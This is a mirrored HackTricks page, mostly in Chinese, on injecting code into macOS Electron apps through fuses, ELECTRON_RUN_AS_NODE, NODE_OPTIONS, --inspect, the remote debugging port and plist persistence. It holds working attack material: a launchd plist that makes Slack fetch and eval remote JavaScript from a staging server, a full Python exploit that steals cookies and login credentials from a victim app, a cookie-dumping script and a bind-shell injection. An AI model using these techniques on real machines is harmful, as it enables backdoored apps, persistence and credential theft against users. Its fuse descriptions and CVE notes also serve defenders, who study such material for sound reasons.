mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
480 lines
22 KiB
Markdown
480 lines
22 KiB
Markdown
# macOS Electron Applications Injection
|
||
|
||
{{#include ../../../banners/hacktricks-training.md}}
|
||
|
||
## 基本信息
|
||
|
||
如果你不知道 Electron 是什么,你可以在 [**这里找到很多信息**](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--contextisolation)。但现在只需知道 Electron 运行 **node**。\
|
||
而 node 有一些 **参数** 和 **环境变量** 可以用来 **执行其他代码**,而不是指定的文件。
|
||
|
||
### Electron Fuses
|
||
|
||
这些技术将在接下来讨论,但最近 Electron 添加了几个 **安全标志以防止它们**。这些是 [**Electron Fuses**](https://www.electronjs.org/docs/latest/tutorial/fuses),用于 **防止** macOS 中的 Electron 应用 **加载任意代码**:
|
||
|
||
- **`RunAsNode`**:如果禁用,它会阻止使用环境变量 **`ELECTRON_RUN_AS_NODE`** 来注入代码。
|
||
- **`EnableNodeCliInspectArguments`**:如果禁用,像 `--inspect`、`--inspect-brk` 这样的参数将不被尊重。避免通过这种方式注入代码。
|
||
- **`EnableEmbeddedAsarIntegrityValidation`**:如果启用,加载的 **`asar`** **文件** 将由 macOS **验证**。以此方式 **防止** 通过修改该文件的内容进行 **代码注入**。
|
||
- **`OnlyLoadAppFromAsar`**:如果启用,它将只检查并使用 app.asar,而不是按以下顺序加载:**`app.asar`**、**`app`**,最后是 **`default_app.asar`**。因此确保当与 **`embeddedAsarIntegrityValidation`** fuse **结合** 时,**不可能** **加载未验证的代码**。
|
||
- **`LoadBrowserProcessSpecificV8Snapshot`**:如果启用,浏览器进程使用名为 `browser_v8_context_snapshot.bin` 的文件作为其 V8 快照。
|
||
|
||
另一个有趣的 fuse 不会阻止代码注入的是:
|
||
|
||
- **EnableCookieEncryption**:如果启用,磁盘上的 cookie 存储将使用操作系统级别的加密密钥进行加密。
|
||
|
||
### 检查 Electron Fuses
|
||
|
||
你可以通过以下方式 **检查这些标志**:
|
||
```bash
|
||
npx @electron/fuses read --app /Applications/Slack.app
|
||
|
||
Analyzing app: Slack.app
|
||
Fuse Version: v1
|
||
RunAsNode is Disabled
|
||
EnableCookieEncryption is Enabled
|
||
EnableNodeOptionsEnvironmentVariable is Disabled
|
||
EnableNodeCliInspectArguments is Disabled
|
||
EnableEmbeddedAsarIntegrityValidation is Enabled
|
||
OnlyLoadAppFromAsar is Enabled
|
||
LoadBrowserProcessSpecificV8Snapshot is Disabled
|
||
```
|
||
### 修改 Electron Fuses
|
||
|
||
正如 [**文档提到的**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode),**Electron Fuses** 的配置是在 **Electron binary** 内部配置的,其中包含字符串 **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`**。
|
||
|
||
在 macOS 应用程序中,这通常位于 `application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework`
|
||
```bash
|
||
grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/
|
||
Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches
|
||
```
|
||
您可以在 [https://hexed.it/](https://hexed.it/) 中加载此文件并搜索前面的字符串。在此字符串之后,您可以在 ASCII 中看到一个数字 "0" 或 "1",指示每个保险丝是禁用还是启用。只需修改十六进制代码(`0x30` 是 `0`,`0x31` 是 `1`)以 **修改保险丝值**。
|
||
|
||
<figure><img src="../../../images/image (34).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
请注意,如果您尝试 **覆盖** 应用程序内部的 **`Electron Framework`** 二进制文件并修改这些字节,则应用程序将无法运行。
|
||
|
||
## 向 Electron 应用程序添加 RCE 代码
|
||
|
||
可能有 **外部 JS/HTML 文件** 被 Electron 应用程序使用,因此攻击者可以在这些文件中注入代码,这些文件的签名不会被检查,并在应用程序的上下文中执行任意代码。
|
||
|
||
> [!CAUTION]
|
||
> 但是,目前有 2 个限制:
|
||
>
|
||
> - 修改应用程序需要 **`kTCCServiceSystemPolicyAppBundles`** 权限,因此默认情况下这不再可能。
|
||
> - 编译后的 **`asap`** 文件通常具有 **`embeddedAsarIntegrityValidation`** 和 **`onlyLoadAppFromAsar`** `启用`
|
||
>
|
||
> 这使得攻击路径更加复杂(或不可能)。
|
||
|
||
请注意,可以通过将应用程序复制到另一个目录(如 **`/tmp`**),将文件夹 **`app.app/Contents`** 重命名为 **`app.app/NotCon`**,**修改** **asar** 文件以包含您的 **恶意** 代码,然后将其重命名回 **`app.app/Contents`** 并执行它,从而绕过 **`kTCCServiceSystemPolicyAppBundles`** 的要求。
|
||
|
||
您可以使用以下命令从 asar 文件中解压代码:
|
||
```bash
|
||
npx asar extract app.asar app-decomp
|
||
```
|
||
将其打包回来,修改为:
|
||
```bash
|
||
npx asar pack app-decomp app-new.asar
|
||
```
|
||
## RCE with ELECTRON_RUN_AS_NODE
|
||
|
||
根据[**文档**](https://www.electronjs.org/docs/latest/api/environment-variables#electron_run_as_node),如果设置了这个环境变量,它将以普通的 Node.js 进程启动该进程。
|
||
```bash
|
||
# Run this
|
||
ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
|
||
# Then from the nodeJS console execute:
|
||
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
|
||
```
|
||
> [!CAUTION]
|
||
> 如果熔断器 **`RunAsNode`** 被禁用,环境变量 **`ELECTRON_RUN_AS_NODE`** 将被忽略,这将无法工作。
|
||
|
||
### 从应用程序 Plist 注入
|
||
|
||
正如 [**这里提到的**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/),您可以在 plist 中滥用这个环境变量以保持持久性:
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||
<plist version="1.0">
|
||
<dict>
|
||
<key>EnvironmentVariables</key>
|
||
<dict>
|
||
<key>ELECTRON_RUN_AS_NODE</key>
|
||
<string>true</string>
|
||
</dict>
|
||
<key>Label</key>
|
||
<string>com.xpnsec.hideme</string>
|
||
<key>ProgramArguments</key>
|
||
<array>
|
||
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
|
||
<string>-e</string>
|
||
<string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
|
||
</array>
|
||
<key>RunAtLoad</key>
|
||
<true/>
|
||
</dict>
|
||
</plist>
|
||
```
|
||
## RCE with `NODE_OPTIONS`
|
||
|
||
您可以将有效负载存储在不同的文件中并执行它:
|
||
```bash
|
||
# Content of /tmp/payload.js
|
||
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator');
|
||
|
||
# Execute
|
||
NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
|
||
```
|
||
> [!CAUTION]
|
||
> 如果熔断器 **`EnableNodeOptionsEnvironmentVariable`** 被 **禁用**,则应用在启动时将 **忽略** 环境变量 **NODE_OPTIONS**,除非环境变量 **`ELECTRON_RUN_AS_NODE`** 被设置,如果熔断器 **`RunAsNode`** 被禁用,该变量也将被 **忽略**。
|
||
>
|
||
> 如果您不设置 **`ELECTRON_RUN_AS_NODE`**,您将会发现 **错误**:`Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.`
|
||
|
||
### 从 App Plist 注入
|
||
|
||
您可以在 plist 中滥用此环境变量以保持持久性,添加以下键:
|
||
```xml
|
||
<dict>
|
||
<key>EnvironmentVariables</key>
|
||
<dict>
|
||
<key>ELECTRON_RUN_AS_NODE</key>
|
||
<string>true</string>
|
||
<key>NODE_OPTIONS</key>
|
||
<string>--require /tmp/payload.js</string>
|
||
</dict>
|
||
<key>Label</key>
|
||
<string>com.hacktricks.hideme</string>
|
||
<key>RunAtLoad</key>
|
||
<true/>
|
||
</dict>
|
||
```
|
||
## RCE with inspecting
|
||
|
||
根据[**这个**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f)的说法,如果你使用 **`--inspect`**、**`--inspect-brk`** 和 **`--remote-debugging-port`** 等标志执行 Electron 应用程序,将会 **打开一个调试端口**,这样你就可以连接到它(例如从 Chrome 的 `chrome://inspect`),并且你将能够 **在其上注入代码**,甚至启动新进程。\
|
||
例如:
|
||
```bash
|
||
/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
|
||
# Connect to it using chrome://inspect and execute a calculator with:
|
||
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
|
||
```
|
||
在[**这篇博客**](https://hackerone.com/reports/1274695)中,这种调试被滥用,使得无头 Chrome **在任意位置下载任意文件**。
|
||
|
||
> [!TIP]
|
||
> 如果一个应用有其自定义的方式来检查环境变量或参数,例如 `--inspect` 是否设置,你可以尝试在运行时使用参数 `--inspect-brk` **绕过** 它,这将 **在应用开始时停止执行** 并执行一个绕过(例如,覆盖当前进程的参数或环境变量)。
|
||
|
||
以下是一个利用监控和执行带有参数 `--inspect-brk` 的应用的漏洞,通过这种方式可以绕过它的自定义保护(覆盖进程的参数以移除 `--inspect-brk`),然后注入一个 JS 负载以转储应用的 cookies 和凭据:
|
||
```python
|
||
import asyncio
|
||
import websockets
|
||
import json
|
||
import requests
|
||
import os
|
||
import psutil
|
||
from time import sleep
|
||
|
||
INSPECT_URL = None
|
||
CONT = 0
|
||
CONTEXT_ID = None
|
||
NAME = None
|
||
UNIQUE_ID = None
|
||
|
||
JS_PAYLOADS = """
|
||
var { webContents } = require('electron');
|
||
var fs = require('fs');
|
||
|
||
var wc = webContents.getAllWebContents()[0]
|
||
|
||
|
||
function writeToFile(filePath, content) {
|
||
const data = typeof content === 'string' ? content : JSON.stringify(content, null, 2);
|
||
|
||
fs.writeFile(filePath, data, (err) => {
|
||
if (err) {
|
||
console.error(`Error writing to file ${filePath}:`, err);
|
||
} else {
|
||
console.log(`File written successfully at ${filePath}`);
|
||
}
|
||
});
|
||
}
|
||
|
||
function get_cookies() {
|
||
intervalIdCookies = setInterval(() => {
|
||
console.log("Checking cookies...");
|
||
wc.session.cookies.get({})
|
||
.then((cookies) => {
|
||
tokenCookie = cookies.find(cookie => cookie.name === "token");
|
||
if (tokenCookie){
|
||
writeToFile("/tmp/cookies.txt", cookies);
|
||
clearInterval(intervalIdCookies);
|
||
wc.executeJavaScript(`alert("Cookies stolen and written to /tmp/cookies.txt")`);
|
||
}
|
||
})
|
||
}, 1000);
|
||
}
|
||
|
||
function get_creds() {
|
||
in_location = false;
|
||
intervalIdCreds = setInterval(() => {
|
||
if (wc.mainFrame.url.includes("https://www.victim.com/account/login")) {
|
||
in_location = true;
|
||
console.log("Injecting creds logger...");
|
||
wc.executeJavaScript(`
|
||
(function() {
|
||
email = document.getElementById('login_email_id');
|
||
password = document.getElementById('login_password_id');
|
||
if (password && email) {
|
||
return email.value+":"+password.value;
|
||
}
|
||
})();
|
||
`).then(result => {
|
||
writeToFile("/tmp/victim_credentials.txt", result);
|
||
})
|
||
}
|
||
else if (in_location) {
|
||
wc.executeJavaScript(`alert("Creds stolen and written to /tmp/victim_credentials.txt")`);
|
||
clearInterval(intervalIdCreds);
|
||
}
|
||
}, 10); // Check every 10ms
|
||
setTimeout(() => clearInterval(intervalId), 20000); // Stop after 20 seconds
|
||
}
|
||
|
||
get_cookies();
|
||
get_creds();
|
||
console.log("Payloads injected");
|
||
"""
|
||
|
||
async def get_debugger_url():
|
||
"""
|
||
Fetch the local inspector's WebSocket URL from the JSON endpoint.
|
||
Assumes there's exactly one debug target.
|
||
"""
|
||
global INSPECT_URL
|
||
|
||
url = "http://127.0.0.1:9229/json"
|
||
response = requests.get(url)
|
||
data = response.json()
|
||
if not data:
|
||
raise RuntimeError("No debug targets found on port 9229.")
|
||
# data[0] should contain an object with "webSocketDebuggerUrl"
|
||
ws_url = data[0].get("webSocketDebuggerUrl")
|
||
if not ws_url:
|
||
raise RuntimeError("webSocketDebuggerUrl not found in inspector data.")
|
||
INSPECT_URL = ws_url
|
||
|
||
|
||
async def monitor_victim():
|
||
print("Monitoring victim process...")
|
||
found = False
|
||
while not found:
|
||
sleep(1) # Check every second
|
||
for process in psutil.process_iter(attrs=['pid', 'name']):
|
||
try:
|
||
# Check if the process name contains "victim"
|
||
if process.info['name'] and 'victim' in process.info['name']:
|
||
found = True
|
||
print(f"Found victim process (PID: {process.info['pid']}). Terminating...")
|
||
os.kill(process.info['pid'], 9) # Force kill the process
|
||
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
|
||
# Handle processes that might have terminated or are inaccessible
|
||
pass
|
||
os.system("open /Applications/victim.app --args --inspect-brk")
|
||
|
||
async def bypass_protections():
|
||
global CONTEXT_ID, NAME, UNIQUE_ID
|
||
print(f"Connecting to {INSPECT_URL} ...")
|
||
|
||
async with websockets.connect(INSPECT_URL) as ws:
|
||
data = await send_cmd(ws, "Runtime.enable", get_first=True)
|
||
CONTEXT_ID = data["params"]["context"]["id"]
|
||
NAME = data["params"]["context"]["name"]
|
||
UNIQUE_ID = data["params"]["context"]["uniqueId"]
|
||
|
||
sleep(1)
|
||
|
||
await send_cmd(ws, "Debugger.enable", {"maxScriptsCacheSize": 10000000})
|
||
|
||
await send_cmd(ws, "Profiler.enable")
|
||
|
||
await send_cmd(ws, "Debugger.setBlackboxPatterns", {"patterns": ["/node_modules/|/browser_components/"], "skipAnonnymous": False})
|
||
|
||
await send_cmd(ws, "Runtime.runIfWaitingForDebugger")
|
||
|
||
await send_cmd(ws, "Runtime.executionContextCreated", get_first=False, params={"context": {"id": CONTEXT_ID, "origin": "", "name": NAME, "uniqueId": UNIQUE_ID, "auxData": {"isDefault": True}}})
|
||
|
||
code_to_inject = """process['argv'] = ['/Applications/victim.app/Contents/MacOS/victim']"""
|
||
await send_cmd(ws, "Runtime.evaluate", get_first=False, params={"expression": code_to_inject, "uniqueContextId":UNIQUE_ID})
|
||
print("Injected code to bypass protections")
|
||
|
||
|
||
async def js_payloads():
|
||
global CONT, CONTEXT_ID, NAME, UNIQUE_ID
|
||
|
||
print(f"Connecting to {INSPECT_URL} ...")
|
||
|
||
async with websockets.connect(INSPECT_URL) as ws:
|
||
data = await send_cmd(ws, "Runtime.enable", get_first=True)
|
||
CONTEXT_ID = data["params"]["context"]["id"]
|
||
NAME = data["params"]["context"]["name"]
|
||
UNIQUE_ID = data["params"]["context"]["uniqueId"]
|
||
await send_cmd(ws, "Runtime.compileScript", get_first=False, params={"expression":JS_PAYLOADS,"sourceURL":"","persistScript":False,"executionContextId":1})
|
||
await send_cmd(ws, "Runtime.evaluate", get_first=False, params={"expression":JS_PAYLOADS,"objectGroup":"console","includeCommandLineAPI":True,"silent":False,"returnByValue":False,"generatePreview":True,"userGesture":False,"awaitPromise":False,"replMode":True,"allowUnsafeEvalBlockedByCSP":True,"uniqueContextId":UNIQUE_ID})
|
||
|
||
|
||
|
||
async def main():
|
||
await monitor_victim()
|
||
sleep(3)
|
||
await get_debugger_url()
|
||
await bypass_protections()
|
||
|
||
sleep(7)
|
||
|
||
await js_payloads()
|
||
|
||
|
||
|
||
async def send_cmd(ws, method, get_first=False, params={}):
|
||
"""
|
||
Send a command to the inspector and read until we get a response with matching "id".
|
||
"""
|
||
global CONT
|
||
|
||
CONT += 1
|
||
|
||
# Send the command
|
||
await ws.send(json.dumps({"id": CONT, "method": method, "params": params}))
|
||
sleep(0.4)
|
||
|
||
# Read messages until we get our command result
|
||
while True:
|
||
response = await ws.recv()
|
||
data = json.loads(response)
|
||
|
||
# Print for debugging
|
||
print(f"[{method} / {CONT}] ->", data)
|
||
|
||
if get_first:
|
||
return data
|
||
|
||
# If this message is a response to our command (by matching "id"), break
|
||
if data.get("id") == CONT:
|
||
return data
|
||
|
||
# Otherwise it's an event or unrelated message; keep reading
|
||
|
||
if __name__ == "__main__":
|
||
asyncio.run(main())
|
||
```
|
||
> [!CAUTION]
|
||
> 如果熔断器 **`EnableNodeCliInspectArguments`** 被禁用,应用程序将 **忽略节点参数**(如 `--inspect`),除非环境变量 **`ELECTRON_RUN_AS_NODE`** 被设置,如果熔断器 **`RunAsNode`** 被禁用,该变量也将被 **忽略**。
|
||
>
|
||
> 然而,您仍然可以使用 **electron 参数 `--remote-debugging-port=9229`**,但之前的有效载荷将无法执行其他进程。
|
||
|
||
使用参数 **`--remote-debugging-port=9222`** 可以从 Electron 应用程序中窃取一些信息,如 **历史记录**(使用 GET 命令)或浏览器的 **cookies**(因为它们在浏览器内部 **解密**,并且有一个 **json 端点** 可以提供它们)。
|
||
|
||
您可以在 [**这里**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) 和 [**这里**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) 学习如何做到这一点,并使用自动工具 [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) 或简单的脚本,如:
|
||
```python
|
||
import websocket
|
||
ws = websocket.WebSocket()
|
||
ws.connect("ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00", suppress_origin=True)
|
||
ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}')
|
||
print(ws.recv()
|
||
```
|
||
### 从应用程序 Plist 注入
|
||
|
||
您可以在 plist 中滥用此环境变量以保持持久性,添加以下键:
|
||
```xml
|
||
<dict>
|
||
<key>ProgramArguments</key>
|
||
<array>
|
||
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
|
||
<string>--inspect</string>
|
||
</array>
|
||
<key>Label</key>
|
||
<string>com.hacktricks.hideme</string>
|
||
<key>RunAtLoad</key>
|
||
<true/>
|
||
</dict>
|
||
```
|
||
## TCC Bypass abusing Older Versions
|
||
|
||
> [!TIP]
|
||
> macOS 的 TCC 守护进程不会检查应用程序的执行版本。因此,如果您 **无法使用任何先前的技术在 Electron 应用程序中注入代码**,您可以下载该应用程序的早期版本并在其上注入代码,因为它仍然会获得 TCC 权限(除非信任缓存阻止它)。
|
||
|
||
## Run non JS Code
|
||
|
||
先前的技术将允许您在 **Electron 应用程序的进程中运行 JS 代码**。但是,请记住,**子进程在与父应用程序相同的沙箱配置文件下运行**,并且 **继承它们的 TCC 权限**。\
|
||
因此,如果您想利用权限访问摄像头或麦克风,例如,您可以直接 **从进程中运行另一个二进制文件**。
|
||
|
||
## Notable Electron macOS Vulnerabilities (2023-2024)
|
||
|
||
### CVE-2023-44402 – ASAR integrity bypass
|
||
|
||
Electron ≤22.3.23 和各种 23-27 预发布版本允许具有写入权限的攻击者绕过 `embeddedAsarIntegrityValidation` **和** `onlyLoadAppFromAsar` 保护。该漏洞是完整性检查器中的 *文件类型混淆*,使得一个精心制作的 **名为 `app.asar` 的目录** 被加载,而不是经过验证的归档,因此放置在该目录中的任何 JavaScript 在应用程序启动时都会被执行。因此,即使是遵循了加固指导并启用了这两个保护的供应商,在 macOS 上仍然存在漏洞。
|
||
|
||
已修补的 Electron 版本:**22.3.24**、**24.8.3**、**25.8.1**、**26.2.1** 和 **27.0.0-alpha.7**。发现运行旧版本应用程序的攻击者可以用自己的目录覆盖 `Contents/Resources/app.asar`,以使用应用程序的 TCC 权限执行代码。
|
||
|
||
### 2024 “RunAsNode” / “enableNodeCliInspectArguments” CVE cluster
|
||
|
||
在 2024 年 1 月,一系列 CVE(CVE-2024-23738 至 CVE-2024-23743)突显出许多 Electron 应用程序仍然启用了 **RunAsNode** 和 **EnableNodeCliInspectArguments** 保护。因此,本地攻击者可以通过环境变量 `ELECTRON_RUN_AS_NODE=1` 或标志如 `--inspect-brk` 重新启动程序,将其转变为 *通用* Node.js 进程,并继承所有应用程序的沙箱和 TCC 权限。
|
||
|
||
尽管 Electron 团队对“关键”评级提出异议,并指出攻击者已经需要本地代码执行,但该问题在后期利用中仍然有价值,因为它将任何易受攻击的 Electron 包转变为 *living-off-the-land* 二进制文件,例如可以读取联系人、照片或其他先前授予桌面应用程序的敏感资源。
|
||
|
||
Electron 维护者的防御指导:
|
||
|
||
* 在生产版本中禁用 `RunAsNode` 和 `EnableNodeCliInspectArguments` 保护。
|
||
* 如果您的应用程序确实需要辅助 Node.js 进程,请使用更新的 **UtilityProcess** API,而不是重新启用这些保护。
|
||
|
||
## Automatic Injection
|
||
|
||
- [**electroniz3r**](https://github.com/r3ggi/electroniz3r)
|
||
|
||
工具 [**electroniz3r**](https://github.com/r3ggi/electroniz3r) 可以轻松用于 **查找已安装的易受攻击的 Electron 应用程序** 并在其上注入代码。该工具将尝试使用 **`--inspect`** 技术:
|
||
|
||
您需要自己编译它,可以这样使用:
|
||
```bash
|
||
# Find electron apps
|
||
./electroniz3r list-apps
|
||
|
||
╔══════════════════════════════════════════════════════════════════════════════════════════════════════╗
|
||
║ Bundle identifier │ Path ║
|
||
╚──────────────────────────────────────────────────────────────────────────────────────────────────────╝
|
||
com.microsoft.VSCode /Applications/Visual Studio Code.app
|
||
org.whispersystems.signal-desktop /Applications/Signal.app
|
||
org.openvpn.client.app /Applications/OpenVPN Connect/OpenVPN Connect.app
|
||
com.neo4j.neo4j-desktop /Applications/Neo4j Desktop.app
|
||
com.electron.dockerdesktop /Applications/Docker.app/Contents/MacOS/Docker Desktop.app
|
||
org.openvpn.client.app /Applications/OpenVPN Connect/OpenVPN Connect.app
|
||
com.github.GitHubClient /Applications/GitHub Desktop.app
|
||
com.ledger.live /Applications/Ledger Live.app
|
||
com.postmanlabs.mac /Applications/Postman.app
|
||
com.tinyspeck.slackmacgap /Applications/Slack.app
|
||
com.hnc.Discord /Applications/Discord.app
|
||
|
||
# Check if an app has vulenrable fuses vulenrable
|
||
## It will check it by launching the app with the param "--inspect" and checking if the port opens
|
||
/electroniz3r verify "/Applications/Discord.app"
|
||
|
||
/Applications/Discord.app started the debug WebSocket server
|
||
The application is vulnerable!
|
||
You can now kill the app using `kill -9 57739`
|
||
|
||
# Get a shell inside discord
|
||
## For more precompiled-scripts check the code
|
||
./electroniz3r inject "/Applications/Discord.app" --predefined-script bindShell
|
||
|
||
/Applications/Discord.app started the debug WebSocket server
|
||
The webSocketDebuggerUrl is: ws://127.0.0.1:13337/8e0410f0-00e8-4e0e-92e4-58984daf37e5
|
||
Shell binding requested. Check `nc 127.0.0.1 12345`
|
||
```
|
||
- [https://github.com/boku7/Loki](https://github.com/boku7/Loki)
|
||
|
||
Loki 旨在通过用 Loki 命令与控制 JavaScript 文件替换应用程序的 JavaScript 文件来对 Electron 应用程序进行后门攻击。
|
||
|
||
## References
|
||
|
||
- [https://www.electronjs.org/docs/latest/tutorial/fuses](https://www.electronjs.org/docs/latest/tutorial/fuses)
|
||
- [https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks)
|
||
- [https://github.com/electron/electron/security/advisories/GHSA-7m48-wc93-9g85](https://github.com/electron/electron/security/advisories/GHSA-7m48-wc93-9g85)
|
||
- [https://www.electronjs.org/blog/statement-run-as-node-cves](https://www.electronjs.org/blog/statement-run-as-node-cves)
|
||
- [https://m.youtube.com/watch?v=VWQY5R2A6X8](https://m.youtube.com/watch?v=VWQY5R2A6X8)
|
||
|
||
{{#include ../../../banners/hacktricks-training.md}}
|